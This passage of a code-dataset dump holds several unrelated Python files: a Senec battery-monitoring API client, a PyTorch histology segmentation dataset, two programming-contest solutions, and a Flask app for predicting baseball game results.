get_all_values(self):\r\n request_json = {\"STATISTIC\": {},\"ENERGY\": {},\"FEATURES\": {},\"LOG\": {},\"SYS_UPDATE\": {},\"WIZARD\": {},\"BMS\": {},\"BAT1\": 
{},\"BAT1OBJ1\": {},\"BAT1OBJ2\": {},\"BAT1OBJ3\": {},\"BAT1OBJ4\": {},\"PWR_UNIT\": {},\"PV1\": {},\"FACTORY\": {},\"GRIDCONFIG\": {}}\r\n        response = requests.post(self.read_api, json=request_json)\r\n        if response.status_code == 200:\r\n            return self.__decode_data(response.json())\r\n        else:\r\n            return {\"msg\": f\"Status code {response.status_code}\"}\r\n\r\n    def __decode_data(self, data):\r\n        return { k: self.__decode_data_helper(v) for k, v in data.items() }\r\n\r\n    def __decode_data_helper(self, data):\r\n        if isinstance(data, str):\r\n            return self.__decode_value(data)\r\n        if isinstance(data, list):\r\n            return [self.__decode_value(val) for val in data]\r\n        if isinstance(data, dict):\r\n            return { k: self.__decode_data_helper(v) for k, v in data.items() }\r\n\r\n    def __decode_value(self, value):\r\n        if value.startswith(\"fl_\"):\r\n            return struct.unpack('!f', bytes.fromhex(value[3:]))[0]\r\n        if value.startswith(\"u8_\"):\r\n            return struct.unpack('!B', bytes.fromhex(value[3:]))[0]\r\n        if value.startswith(\"i3_\") or value.startswith(\"i8_\") or value.startswith(\"u3_\") or value.startswith(\"u1_\"):\r\n            return int(value[3:], 16)\r\n        if value.startswith(\"st_\"):\r\n            return value[3:]\r\n        return value\r\n\r\n    def __substitute_system_state(self, data):\r\n        system_state = data['STATISTIC']['CURRENT_STATE']\r\n        data['STATISTIC']['CURRENT_STATE'] = SYSTEM_STATE_NAME[system_state]\r\n        return data\r\n\r\nBASIC_REQUEST = {\r\n    'STATISTIC': {\r\n        'CURRENT_STATE': ''                 # Current state of the system (int, see SYSTEM_STATE_NAME)\r\n        #'LIVE_BAT_CHARGE_MASTER': '',      # Battery charge amount since installation (kWh)\r\n        #'LIVE_BAT_DISCHARGE_MASTER': '',   # Battery discharge amount since installation (kWh)\r\n        #'LIVE_GRID_EXPORT': '',            # Grid export amount since installation (kWh)\r\n        #'LIVE_GRID_IMPORT': '',            # Grid import amount since installation (kWh)\r\n        #'LIVE_HOUSE_CONS': '',             # House consumption since installation (kWh)\r\n        #'LIVE_PV_GEN': '',                 # PV generated power since installation (kWh)\r\n        #'MEASURE_TIME': ''                 # Unix timestamp for above values (ms)\r\n    },\r\n    'ENERGY': {\r\n        #'GUI_BAT_DATA_CURRENT': '',        # Battery charge current: negative if discharging, positive if charging (A)\r\n        'GUI_BAT_DATA_FUEL_CHARGE': '',     # Remaining battery (percent)\r\n        'GUI_BAT_DATA_POWER': '',           # Battery charge power: negative if discharging, positive if charging (W)\r\n        #'GUI_BAT_DATA_VOLTAGE': '',        # Battery voltage (V)\r\n        'GUI_GRID_POW': '',                 # Grid power: negative if exporting, positive if importing (W)\r\n        'GUI_HOUSE_POW': '',                # House power consumption (W)\r\n        'GUI_INVERTER_POWER': ''            # PV production (W)\r\n        #'STAT_HOURS_OF_OPERATION': ''      # Appliance hours of operation\r\n    },\r\n    'PV1': {\r\n        #'MPP_CUR': '',                     # List: MPP current (A)\r\n        'MPP_POWER': '',                    # List: MPP power (W)\r\n        #'MPP_VOL': '',                     # List: MPP voltage (V)\r\n        'POWER_RATIO': ''                   # Grid export limit (percent)\r\n        #'P_TOTAL': ''                      # ?\r\n    },\r\n    'BMS':{\r\n        #'CHARGED_ENERGY': '',              # List: Charged energy per battery\r\n        #'DISCHARGED_ENERGY': '',           # List: Discharged energy per battery\r\n        #'CYCLES': ''                       # List: Cycles per battery\r\n        'CELL_TEMPERATURES_MODULE_A':'',\r\n        'CELL_TEMPERATURES_MODULE_B':'',\r\n        'CELL_TEMPERATURES_MODULE_C':'',\r\n        'CELL_TEMPERATURES_MODULE_D':'',\r\n        'CELL_VOLTAGES_MODULE_A':'',\r\n        'CELL_VOLTAGES_MODULE_B':'',\r\n        'CELL_VOLTAGES_MODULE_C':'',\r\n        'CELL_VOLTAGES_MODULE_D':''\r\n    },\r\n    'FACTORY': {\r\n        'DESIGN_CAPACITY': '',              # Battery design capacity (Wh)\r\n        'MAX_CHARGE_POWER_DC': '',       # Battery max charging power (W)\r\n        
'MAX_DISCHARGE_POWER_DC': '',    # Battery max discharging power (W)\r\n        'DEVICE_ID':''                 # Device serial number\r\n    },\r\n    'WIZARD': {\r\n        'APPLICATION_VERSION': ''\r\n    }\r\n\r\n}\r\n\r\nSYSTEM_STATE_NAME = {\r\n    0: \"INITIAL STATE\",\r\n    1: \"ERROR INVERTER COMMUNICATION\",\r\n    2: \"ERROR ELECTRICITY METER\",\r\n    3: \"RIPPLE CONTROL RECEIVER\",\r\n    4: \"INITIAL CHARGE\",\r\n    5: \"MAINTENANCE CHARGE\",\r\n    6: \"MAINTENANCE READY\",\r\n    7: \"MAINTENANCE REQUIRED\",\r\n    8: \"MAN. SAFETY CHARGE\",\r\n    9: \"SAFETY CHARGE READY\",\r\n    10: \"FULL CHARGE\",\r\n    11: \"EQUALIZATION: CHARGE\",\r\n    12: \"DESULFATATION: CHARGE\",\r\n    13: \"BATTERY FULL\",\r\n    14: \"CHARGE\",\r\n    15: \"BATTERY EMPTY\",\r\n    16: \"DISCHARGE\",\r\n    17: \"PV + DISCHARGE\",\r\n    18: \"GRID + DISCHARGE\",\r\n    19: \"PASSIVE\",\r\n    20: \"OFF\",\r\n    21: \"OWN CONSUMPTION\",\r\n    22: \"RESTART\",\r\n    23: \"MAN. EQUALIZATION: CHARGE\",\r\n    24: \"MAN. DESULFATATION: CHARGE\",\r\n    25: \"SAFETY CHARGE\",\r\n    26: \"BATTERY PROTECTION MODE\",\r\n    27: \"EG ERROR\",\r\n    28: \"EG CHARGE\",\r\n    29: \"EG DISCHARGE\",\r\n    30: \"EG PASSIVE\",\r\n    31: \"EG PROHIBIT CHARGE\",\r\n    32: \"EG PROHIBIT DISCHARGE\",\r\n    33: \"EMERGENCY CHARGE\",\r\n    34: \"SOFTWARE UPDATE\",\r\n    35: \"NSP ERROR\",\r\n    36: \"NSP ERROR: GRID\",\r\n    37: \"NSP ERROR: HARDWARE\",\r\n    38: \"NO SERVER CONNECTION\",\r\n    39: \"BMS ERROR\",\r\n    40: \"MAINTENANCE: FILTER\",\r\n    41: \"SLEEPING MODE\",\r\n    42: \"WAITING EXCESS\",\r\n    43: \"CAPACITY TEST: CHARGE\",\r\n    44: \"CAPACITY TEST: DISCHARGE\",\r\n    45: \"MAN. DESULFATATION: WAIT\",\r\n    46: \"MAN. DESULFATATION: READY\",\r\n    47: \"MAN. DESULFATATION: ERROR\",\r\n    48: \"EQUALIZATION: WAIT\",\r\n    49: \"EMERGENCY CHARGE: ERROR\",\r\n    50: \"MAN. EQUALIZATION: WAIT\",\r\n    51: \"MAN. EQUALIZATION: ERROR\",\r\n    52: \"MAN. EQUALIZATION: READY\",\r\n    53: \"AUTO. DESULFATATION: WAIT\",\r\n    54: \"ABSORPTION PHASE\",\r\n    55: \"DC-SWITCH OFF\",\r\n    56: \"PEAK-SHAVING: WAIT\",\r\n    57: \"ERROR BATTERY INVERTER\",\r\n    58: \"NPU-ERROR\",\r\n    59: \"BMS OFFLINE\",\r\n    60: \"MAINTENANCE CHARGE ERROR\",\r\n    61: \"MAN. 
SAFETY CHARGE ERROR\",\r\n    62: \"SAFETY CHARGE ERROR\",\r\n    63: \"NO CONNECTION TO MASTER\",\r\n    64: \"LITHIUM SAFE MODE ACTIVE\",\r\n    65: \"LITHIUM SAFE MODE DONE\",\r\n    66: \"BATTERY VOLTAGE ERROR\",\r\n    67: \"BMS DC SWITCHED OFF\",\r\n    68: \"GRID INITIALIZATION\",\r\n    69: \"GRID STABILIZATION\",\r\n    70: \"REMOTE SHUTDOWN\",\r\n    71: \"OFFPEAK-CHARGE\",\r\n    72: \"ERROR HALFBRIDGE\",\r\n    73: \"BMS: ERROR OPERATING TEMPERATURE\",\r\n    74: \"FACTORY SETTINGS NOT FOUND\",\r\n    75: \"BACKUP POWER MODE - ACTIVE\",\r\n    76: \"BACKUP POWER MODE - BATTERY EMPTY\",\r\n    77: \"BACKUP POWER MODE ERROR\",\r\n    78: \"INITIALISING\",\r\n    79: \"INSTALLATION MODE\",\r\n    80: \"GRID OFFLINE\",\r\n    81: \"BMS UPDATE NEEDED\",\r\n    82: \"BMS CONFIGURATION NEEDED\",\r\n    83: \"INSULATION TEST\",\r\n    84: \"SELFTEST\",\r\n    85: \"EXTERNAL CONTROL\",\r\n    86: \"ERROR: TEMPERATURESENSOR\",\r\n    87: \"GRID OPERATOR: CHARGE PROHIBITED\",\r\n    88: \"GRID OPERATOR: DISCHARGE PROHIBITED\",\r\n    89: \"SPARE CAPACITY\",\r\n    90: \"SELFTEST ERROR\",\r\n    91: \"EARTH FAULT\"\r\n}\r\n\r\nif __name__ == \"__main__\":\r\n    api = Senec(\"192.168.1.9\")\r\n    print(api.get_all_values())\r\n","repo_name":"Hobbyflyer/senec_monitoring","sub_path":"senec.py","file_name":"senec.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5521073197","text":"import torch\nimport torch.utils.data as data\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as TF\n\nfrom skimage import color\nfrom PIL.Image import BILINEAR\n\n\nclass TrainDataset(data.Dataset):\n\n    def __init__(self, inputs, labels, length, im_size):\n        super(TrainDataset, self).__init__()\n\n        self.inputs = inputs\n        self.labels = labels\n        self.length = length\n        self.size = im_size\n\n    def spatial_transform(self, input1, label1):\n\n        vflip = torch.rand(1).item() > 0.5\n        hflip = torch.rand(1).item() > 0.5\n        deg = torch.LongTensor(1).random_(-20, 20).item()\n        scale = torch.FloatTensor(1).uniform_(0.8, 1.2)\n\n        image_list = [input1, label1]\n        for i, p in enumerate(image_list):\n            dtype = p.dtype\n\n            p_min = p.min()\n            p_max = p.max()\n\n            p = (p - p_min) / ((p_max - p_min) + 0.001)\n\n            p = TF.to_pil_image(p.float())\n            if vflip:\n                p = TF.vflip(p)\n            if hflip:\n                p = TF.hflip(p)\n\n            p = TF.affine(p, deg, scale=scale, translate=(0, 0), shear=0, resample=BILINEAR)\n            p = TF.to_tensor(p).squeeze()\n\n            p = (p * ((p_max - p_min) + 0.001)) + p_min\n\n            if dtype == torch.int64:\n                p = p.round()\n            p = p.to(dtype=dtype)\n\n            image_list[i] = p.clone()\n\n        input1, mask = image_list\n\n        return input1, mask\n\n    def __getitem__(self, item):\n        # # #\n        # import matplotlib\n        # matplotlib.use('qt5agg')\n        # import matplotlib.pyplot as plt\n        # plt.ion()\n        idx = item % self.length\n\n        input1 = self.inputs[idx]\n        label1 = self.labels[idx]\n\n        if any([x < self.size for x in list(input1.shape[1:3])]):\n            size_diff = torch.tensor([input1.shape[0], self.size, self.size]) - torch.tensor(input1.shape)\n            size_diff[size_diff < 0.0] = 0.0\n            pad = (size_diff[2] // 2, size_diff[2] // 2 + size_diff[2] % 2,\n                   size_diff[1] // 2, size_diff[1] // 2 + size_diff[1] % 2)\n            input1 = F.pad(input1, pad)\n            label1 = F.pad(label1, pad)\n\n        temp = torch.zeros((self.size, self.size))\n\n        while temp.sum() == 0.0:\n            if input1.shape[2] == self.size:\n                x = 0\n            else:\n                x = torch.randint(0, (input1.shape[2] - self.size), (1,)).item()\n\n            if input1.shape[1] == self.size:\n                y = 0\n            else:\n                y = torch.randint(0, (input1.shape[1] - self.size), 
(1,)).item()\n            temp = label1[y: y + self.size, x: x + self.size]\n\n        input1 = input1[:, y: y + self.size, x: x + self.size]\n        label1 = label1[y: y + self.size, x: x + self.size]\n\n        # Spatially transform the source and target\n        input1, mask = self.spatial_transform(input1, label1.long())\n        # mask = torch.round(mask)\n\n        input_hsv = torch.from_numpy(color.rgb2hsv(input1.permute(1, 2, 0).numpy())).permute(2, 0, 1)\n\n        inputs = torch.cat([input1, input_hsv], dim=0)\n\n        return inputs.float(), mask.long()\n\n    def __len__(self):\n        return self.length\n\n\nclass EvalDataset(data.Dataset):\n    def __init__(self, inputs, labels, length, im_size):\n        super(EvalDataset, self).__init__()\n\n        self.inputs = inputs\n        self.labels = labels\n        self.length = length\n        self.size = im_size\n\n    def __getitem__(self, item):\n\n        input1 = self.inputs[item]\n        label1 = self.labels[item]\n\n        if any([x < self.size for x in list(input1.shape[1:3])]):\n            size_diff = torch.tensor([input1.shape[0], self.size, self.size]) - torch.tensor(input1.shape)\n            size_diff[size_diff < 0.0] = 0.0\n            pad = (size_diff[2] // 2, size_diff[2] // 2 + size_diff[2] % 2,\n                   size_diff[1] // 2, size_diff[1] // 2 + size_diff[1] % 2)\n            input1 = F.pad(input1, pad)\n\n        temp = torch.zeros((self.size, self.size))\n\n        while temp.sum() == 0.0:\n            x = torch.randint(0, (input1.shape[2] - self.size), (1,)).item()\n            y = torch.randint(0, (input1.shape[1] - self.size), (1,)).item()\n            temp = label1[y: y + self.size, x: x + self.size]\n\n        input1 = input1[:, y: y + self.size, x: x + self.size]\n        label1 = label1[y: y + self.size, x: x + self.size]\n\n        input_hsv = torch.from_numpy(color.rgb2hsv(input1.permute(1, 2, 0).numpy())).permute(2, 0, 1)\n\n        inputs = torch.cat([input1, input_hsv], dim=0)\n\n        return inputs.float(), label1.long()\n\n    def __len__(self):\n        return self.length\n","repo_name":"blakezim/MR_Hist","sub_path":"Histology/NNSeg/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43142654680","text":"# https://leetcode.com/problems/chalkboard-xor-game/discuss/190068/O(n)-simple-python3-with-explanation-beats-100\n\nclass Solution(object):\n    def xorGame(self, nums):\n\n        r_xor = 0\n        for num in nums:\n            r_xor = r_xor ^ num\n        \n        if r_xor == 0:\n            # if xor of all elements is 0, then Alice wins\n            return True\n        \n        # Alice wins if and only if there is an even number of numbers\n        return len(nums) % 2 == 0","repo_name":"hardik302001/leetcode","sub_path":"problems/chalkboard_xor_game/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23627301921","text":"def explode(s, c):\r\n    t = []\r\n    s += c\r\n    p = 0\r\n    for i in range(len(s)):\r\n        if (s[i] == c or s[i] == \"\\n\") and s[p:i] != \"\" and s[p:i] != \"\\n\":\r\n            t.append(s[p:i])\r\n            p = i + 1\r\n    return t\r\n\r\ndef explodeToInt(s, c):\r\n    a = explode(s, c)\r\n    for i in range(len(a)): a[i] = int(a[i])\r\n    return a\r\n\r\ndef timeToN(n, C, a, s):\r\n    time = s * (n / C)\r\n    for i in range(n % C): time += a[i]\r\n    return time * 2\r\n\r\ndef solveCase(line):\r\n    data = explodeToInt(line, \" \")\r\n    L = data[0]\r\n    t = data[1]\r\n    N = data[2]\r\n    C = data[3]\r\n    a = data[4:]\r\n    s = sum(a)\r\n    for i in range(len(a), N):\r\n        a.append(a[i % C])\r\n\r\n    saved = []\r\n    b1 = False\r\n    for i in range(len(a)):\r\n        if b1: saved.append(a[i])\r\n        else:\r\n            time = 
timeToN(i+1, C, a, s)\r\n            if time >= t:\r\n                b1 = True\r\n                saved.append((time - t)/2)\r\n            else:\r\n                saved.append(0)\r\n\r\n    saved.sort()\r\n    ans = timeToN(N, C, a, s)\r\n    if L > 0: ans -= sum(saved[-1*L:])\r\n\r\n    return str(ans)\r\n\r\ndef process(data):\r\n    out = \"\"\r\n    for i in range(1, len(data)):\r\n        if i > 1: out += '\\n'\r\n        out += \"Case #\" + str(i) + \": \"\r\n        out += solveCase(data[i])\r\n    return out\r\n\r\ndef main(fn):\r\n    iFile = open(fn + \".in\", \"r\")\r\n    oFile = open(fn + \".out\", \"w\")\r\n    print(\"Files opened.\")\r\n\r\n    data = []\r\n    while True:\r\n        line = iFile.readline()\r\n        if not line: break\r\n        data.append(line)\r\n\r\n    out = process(data)\r\n    print(\"Calculations complete. Outputting to file.\")\r\n    oFile.writelines(out)\r\n    print(\"Output complete.\")\r\n    iFile.close()\r\n    oFile.close()\r\n    print(\"Files closed.\")\r\n\r\nmain(\"small\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_85/129.py","file_name":"129.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31358154670","text":"from flask import Flask, request, render_template\r\nimport pickle\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nfrom datetime import date, timedelta, datetime\r\nimport sqlite3\r\nimport re\r\n\r\n\r\nteamAbbr = [\"CHN\",\"PHI\",\"PIT\", \"CIN\", \"SLN\", \"BOS\", \"CHA\",\r\n\t\t\t\t\"CLE\", \"DET\", \"NYA\", \"BAL\", \"LAN\", \"SFN\", \"MIN\",\r\n\t\t\t    \"HOU\", \"NYN\", \"ATL\", \"OAK\", \"KCA\", \"SDN\", \"TEX\",\r\n\t\t\t\t\"TOR\", \"SEA\", \"FLO\", \"COL\", \"ANA\", \"TBA\", \"ARI\",\r\n\t\t\t\t\"MIL\", \"WAS\"]\r\n\r\napp = Flask(__name__)\r\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\r\n\r\n\r\n@app.route('/')\r\n@app.route(\"/<day>\")\r\ndef home(day=str(date.today())):\r\n    date_object = datetime.strptime(day, '%Y-%m-%d')\r\n\r\n    next_date_object = date_object + timedelta(days=1)\r\n    next_day = datetime.strftime(next_date_object, '%Y-%m-%d')\r\n    previous_date_object = date_object - timedelta(days=1)\r\n    previous_day = datetime.strftime(previous_date_object, '%Y-%m-%d')\r\n\r\n    connection = sqlite3.connect('/app/games/gamesSchedule.db')\r\n    #connection = sqlite3.connect(\"C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\games\\\\gamesSchedule.db\")\r\n    crsr = connection.cursor()\r\n\r\n    sql_command = \"SELECT homeTeam, awayTeam, gameDate, gameTime,\" \\\r\n                  \" xgbPredHomeScore, xgbPredAwayScore, logHomeWinPred, logAwayWinPred FROM games WHERE gamedate = \" + \"'\" + str(day) + \"'\"\r\n    games = pd.DataFrame(crsr.execute(sql_command), columns=['Home Team', 'Away Team', 'gameDate', 'gameTime',\r\n                                                             'xgbPredHomeScore', 'xgbPredAwayScore',\r\n                                                             'logHomeWinPrediction', 'logAwayWinPrediction'])\r\n\r\n    gameData=createJSON(games, mode=1)\r\n    return render_template('result.html',games=gameData, day=day, previous_day=previous_day, next_day=next_day)\r\n\r\n@app.route('/predict',methods=['GET','POST'])\r\ndef get_win():\r\n    logModel = pickle.load(open('/app/data-scraper/logmodel.pkl', 'rb'))\r\n    linModel = tf.keras.models.load_model('/app/neural-net/models/regModel')\r\n    data = pd.read_csv('/app/data-scraper/team_averages.csv')\r\n\r\n    #logModel = pickle.load(open('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\data-scraper\\\\logmodel.pkl', 'rb'))\r\n    #linModel = 
pickle.load(open('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\data-scraper\\\\linmodel.pkl', 'rb'))\r\n #linModel = tf.keras.models.load_model('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\neural-net\\\\models\\\\regModel')\r\n #data = pd.read_csv('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\data-scraper\\\\team_averages.csv')\r\n teamNames = []\r\n matchupData = []\r\n\r\n for x in range(30):\r\n abbreviation = teamAbbr[x]\r\n teamNames.append(convertName(abbreviation))\r\n\r\n if request.method == \"POST\":\r\n awayName = request.form.get(\"Away Team\")\r\n homeName = request.form.get(\"Home Team\")\r\n\r\n awayAbbr = convertAbbr(awayName)\r\n homeAbbr = convertAbbr(homeName)\r\n\r\n\r\n matchup = pd.DataFrame(columns=['Home Team', 'Away Team', 'Game Time'])\r\n matchup.loc[1] = [homeAbbr, awayAbbr, \"September 21, 2019\"]\r\n logDF = modifyDF(data,matchup)\r\n logDF.drop(['Win', 'teamAbbr'], axis=1, inplace=True)\r\n winPredictions = logModel.predict(logDF)\r\n\r\n linearDF = modifyLinear(data, matchup)\r\n linearDF.drop(['Win', 'teamAbbr'], axis=1, inplace=True)\r\n print(linearDF.dtypes)\r\n scorePredictions = linModel.predict(linearDF)\r\n\r\n matchupData = createJSON(matchup, winPredictions, scorePredictions, mode=2)\r\n\r\n return render_template('matchup.html',teams = teamNames, predictions=matchupData)\r\n\r\ndef createJSON(games, predictions=None, scores=None, mode=1):\r\n gameDataFinal = []\r\n gameData = {}\r\n keys = [\"Time\", \"HomeTeamAbbr\",\"HomePrediction\",\"HomeLogoPath\",\"HomeScore\", \"AwayTeamAbbr\",\"AwayPrediction\",\"AwayLogoPath\", \"AwayScore\"]\r\n #labels = predictions.astype(np.int32)\r\n\r\n if (mode == 1):\r\n for x in range(games.shape[0]):\r\n\r\n homeTeamName = convertName(games.iloc[x, 0])\r\n awayTeamName = convertName(games.iloc[x, 1])\r\n\r\n gameDate = games.iloc[x, 2]\r\n\r\n gameTime = games.iloc[x, 3]\r\n\r\n homeScorePrediction = games.iloc[x, 4]\r\n awayScorePrediction = games.iloc[x, 5]\r\n\r\n homeTeamPrediction = games.iloc[x, 6]\r\n awayTeamPrediction = games.iloc[x, 7]\r\n\r\n # Checks and balances\r\n # Tie Predicted\r\n if((homeScorePrediction == awayScorePrediction) and homeTeamPrediction == 1):\r\n homeScorePrediction = homeScorePrediction + 1\r\n # Tie Predicted\r\n elif((homeScorePrediction == awayScorePrediction) and homeTeamPrediction == 0):\r\n awayScorePrediction = awayScorePrediction + 1\r\n\r\n elif((homeTeamPrediction == 1) and homeScorePrediction < awayScorePrediction):\r\n homeTeamPrediction = 0\r\n awayTeamPrediction = 1\r\n\r\n elif((awayTeamPrediction == 1) and awayScorePrediction < homeScorePrediction):\r\n awayTeamPrediction = 0\r\n homeTeamPrediction = 1\r\n\r\n regex = re.compile('\\d+-(\\d{2})-\\d+')\r\n month = regex.findall(gameDate)\r\n\r\n month = convertMonth(int(month[0].lstrip('0')))\r\n\r\n regex = re.compile('\\d+-\\d{2}-(\\d{2})')\r\n day = regex.findall(gameDate)\r\n\r\n date = day[0].lstrip('0')\r\n\r\n gameDate = month + \" \" + date + \" @ \" + gameTime\r\n\r\n values = [gameDate, homeTeamName, int(homeTeamPrediction), \"static/\" + games.iloc[x, 0] + \"_Logo.png\",\r\n int(homeScorePrediction), awayTeamName, int(awayTeamPrediction),\r\n \"static/\" + games.iloc[x, 1] + \"_Logo.png\", int(awayScorePrediction)]\r\n\r\n gameData = dict(zip(keys, values))\r\n gameDataFinal.append(gameData)\r\n\r\n elif(mode == 2):\r\n labels = predictions.astype(np.int32)\r\n\r\n for x in range(games.shape[0]):\r\n\r\n awayTeamPrediction = 1\r\n awayTeamPrediction 
^= labels[x]\r\n homeTeamPrediction = labels[x]\r\n homeTeamName = convertName(games.iloc[x, 0])\r\n awayTeamName = convertName(games.iloc[x, 1])\r\n homeScorePrediction = np.int32(np.floor(scores[x * 2]))\r\n awayScorePrediction = np.int32(np.floor(scores[2 * x + 1]))\r\n\r\n # Checks and balances\r\n # Tie Predicted\r\n # Make this a method\r\n if ((homeScorePrediction == awayScorePrediction) and labels[x] == 1):\r\n homeScorePrediction = homeScorePrediction + 1\r\n # Tie Predicted\r\n elif ((homeScorePrediction == awayScorePrediction) and labels[x] == 0):\r\n awayScorePrediction = awayScorePrediction + 1\r\n\r\n elif ((homeTeamPrediction == 1) and homeScorePrediction < awayScorePrediction):\r\n homeTeamPrediction = 0\r\n awayTeamPrediction = 1\r\n\r\n elif ((awayTeamPrediction == 1) and awayScorePrediction < homeScorePrediction):\r\n awayTeamPrediction = 0\r\n homeTeamPrediction = 1\r\n\r\n gameDate = games.iloc[x,2]\r\n\r\n values = [gameDate, homeTeamName, int(homeTeamPrediction),\"static/\" +games.iloc[x,0]+\"_Logo.png\",\r\n int(homeScorePrediction), awayTeamName, int(awayTeamPrediction),\r\n \"static/\" + games.iloc[x,1]+\"_Logo.png\", int(awayScorePrediction)]\r\n\r\n gameData = dict(zip(keys,values))\r\n gameDataFinal.append(gameData)\r\n\r\n return gameDataFinal\r\n\r\ndef modifyDF(data,games):\r\n df = pd.DataFrame(columns=['teamAbbr', 'Score', 'isHomeTeam', 'atBats', 'Hits',\r\n 'Doubles', 'Triples', 'homeRuns', 'Walks', 'Strikeouts', 'LOB',\r\n 'pitchersUsed', 'Errors', 'battingAverage', 'OBP', 'Slugging',\r\n 'OPS', 'Win', 'wonPrev', 'WHIP', 'KPercent', 'BBPercent', 'FIP', 'BABIP', 'ERA',\r\n 'HAllowed', 'defensiveSO'])\r\n\r\n for (idx, row) in games.iterrows():\r\n for (idx2, row2) in data.iterrows():\r\n # Set is home team to 1 and wonPrev to its value as it is an average in this row\r\n if(row2.loc['TeamAbbr'] == row.loc['Home Team']):\r\n df.loc[idx + 1] = [row2['TeamAbbr'], row2['Score'], 1, row2['atBats'],\r\n row2['Hits'], row2['Doubles'], row2['Triples'], row2['homeRuns'],\r\n row2['Walks'], row2['Strikeouts'], row2['LOB'], row2['pitchersUsed'],\r\n row2['Errors'], row2['battingAverage'], row2['OBP'], row2['Slugging'],\r\n row2['OPS'], row2['Win'], row2['wonPrev'], row2['WHIP'], row2['KPercent'],\r\n row2['BBPercent'], row2['FIP'], row2['BABIP'], row2['ERA'], row2['HAllowed'],\r\n row2['defensiveSO']]\r\n\r\n #print(df.tail(10))\r\n return df\r\n\r\ndef modifyLinear(data,games):\r\n df = pd.DataFrame(columns=['teamAbbr', 'isHomeTeam', 'atBats', 'Hits',\r\n 'Doubles', 'Triples', 'homeRuns', 'Walks', 'Strikeouts', 'LOB',\r\n 'Errors', 'battingAverage', 'OBP', 'Slugging',\r\n 'OPS', 'Win', 'wonPrev', 'WHIP', 'KPercent', 'BBPercent', 'FIP', 'BABIP', 'ERA',\r\n 'HAllowed', 'defensiveSO'])\r\n x = 0\r\n for (idx, row) in games.iterrows():\r\n for (idx2,row2) in data.iterrows():\r\n # Set is home team to 1 and wonPrev to its value as it is an average in this row\r\n if(row.loc['Home Team'] == row2.loc['TeamAbbr']):\r\n df.loc[x+1] = [row2['TeamAbbr'], np.float64(1), row2['atBats'],\r\n row2['Hits'], row2['Doubles'], row2['Triples'], row2['homeRuns'],\r\n row2['Walks'], row2['Strikeouts'], row2['LOB'], row2['Errors'], row2['battingAverage'], row2['OBP'], row2['Slugging'],\r\n row2['OPS'], row2['Win'], row2['wonPrev'], row2['WHIP'], row2['KPercent'],\r\n row2['BBPercent'], row2['FIP'], row2['BABIP'], row2['ERA'], row2['HAllowed'], row2['defensiveSO']]\r\n x = x + 1\r\n\r\n for (idx3,row3) in data.iterrows():\r\n if(row.loc['Away Team'] == row3.loc['TeamAbbr']):\r\n 
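# away-team row mirrors the home-team row, with the isHomeTeam flag set to 0\r\n                    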
df.loc[x+1] = [row3['TeamAbbr'], np.float64(0), row3['atBats'],\r\n row3['Hits'], row3['Doubles'], row3['Triples'], row3['homeRuns'],\r\n row3['Walks'], row3['Strikeouts'], row3['LOB'], row3['Errors'], row3['battingAverage'], row3['OBP'],\r\n row3['Slugging'], row3['OPS'], row3['Win'], row3['wonPrev'], row3['WHIP'], row3['KPercent'],\r\n row3['BBPercent'], row3['FIP'], row3['BABIP'], row3['ERA'], row3['HAllowed'], row3['defensiveSO']]\r\n x = x + 1\r\n\r\n #print(df.tail(10))\r\n return df\r\n\r\ndef convertName(teamAbbr):\r\n teamNames = {\"ARI\": \"Diamondbacks\",\r\n \"ATL\": \"Braves\",\r\n \"BAL\": \"Orioles\",\r\n \"BOS\": \"Red Sox\",\r\n \"CHA\": \"White Sox\",\r\n \"CHN\": \"Cubs\",\r\n \"CIN\": \"Reds\",\r\n \"CLE\": \"Indians\",\r\n \"COL\": \"Rockies\",\r\n \"DET\": \"Tigers\",\r\n \"HOU\": \"Astros\",\r\n \"KCA\": \"Royals\",\r\n \"ANA\": \"Angels\",\r\n \"LAN\": \"Dodgers\",\r\n \"FLO\": \"Marlins\",\r\n \"MIL\": \"Brewers\",\r\n \"MIN\": \"Twins\",\r\n \"NYA\": \"Yankees\",\r\n \"NYN\": \"Mets\",\r\n \"OAK\": \"Athletics\",\r\n \"PHI\": \"Phillies\",\r\n \"PIT\": \"Pirates\",\r\n \"SDN\": \"Padres\",\r\n \"SFN\": \"Giants\",\r\n \"SEA\": \"Mariners\",\r\n \"SLN\": \"Cardinals\",\r\n \"TBA\": \"Rays\",\r\n \"TEX\": \"Rangers\",\r\n \"TOR\": \"Blue Jays\",\r\n \"WAS\": \"Nationals\"\r\n\r\n }\r\n\r\n convertedName = teamNames[teamAbbr]\r\n return convertedName\r\n\r\ndef convertAbbr(team):\r\n teamNames = {\"Diamondbacks\": \"ARI\",\r\n \"Braves\": \"ATL\",\r\n \"Orioles\": \"BAL\",\r\n \"Red Sox\": \"BOS\",\r\n \"White Sox\": \"CHA\",\r\n \"Cubs\": \"CHN\",\r\n \"Reds\": \"CIN\",\r\n \"Indians\": \"CLE\",\r\n \"Rockies\": \"COL\",\r\n \"Tigers\": \"DET\",\r\n \"Astros\": \"HOU\",\r\n \"Royals\": \"KCA\",\r\n \"Angels\": \"ANA\",\r\n \"Dodgers\": \"LAN\",\r\n \"Marlins\": \"FLO\",\r\n \"Brewers\": \"MIL\",\r\n \"Twins\": \"MIN\",\r\n \"Yankees\": \"NYA\",\r\n \"Mets\": \"NYN\",\r\n \"Athletics\": 